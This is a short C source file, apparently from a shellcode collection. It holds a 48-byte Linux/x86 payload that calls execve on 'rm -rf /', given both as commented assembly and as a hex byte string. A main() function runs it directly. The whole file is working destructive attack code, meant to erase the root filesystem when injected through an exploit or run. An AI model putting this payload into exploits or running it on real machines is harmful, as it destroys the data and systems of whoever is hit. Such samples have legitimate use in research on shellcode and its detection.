/* By Kris Katterjohn 8/31/2006
 *
 * 48 byte shellcode to execve("rm -rf /") for Linux/x86
 *
 *
 *
 * section .text
 *
 *  global _start
 *
 * _start:
 *
 * ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL)
 *
 *  push byte 11
 *  pop eax
 *  xor esi, esi
 *  push esi
 *  push byte 0x2f
 *  mov edi, esp
 *  push esi
 *  push word 0x662d
 *  mov edx, esp
 *  push esi
 *  push word 0x722d
 *  mov ecx, esp
 *  push esi
 *  push 0x6d722f2f
 *  push 0x6e69622f
 *  mov ebx, esp
 *  push esi
 *  push edi
 *  push edx
 *  push ecx
 *  push ebx
 *  mov ecx, esp
 *  xor edx, edx
 *  int 0x80
 */

main()
{
  char shellcode[] =
    "\x6a\x0b\x58\x31\xf6\x56\x6a\x2f\x89\xe7\x56\x66\x68\x2d\x66"
    "\x89\xe2\x56\x66\x68\x2d\x72\x89\xe1\x56\x68\x2f\x2f\x72\x6d"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x56\x57\x52\x51\x53\x89\xe1\x31"
    "\xd2\xcd\x80";

  (*(void (*)()) shellcode)();
}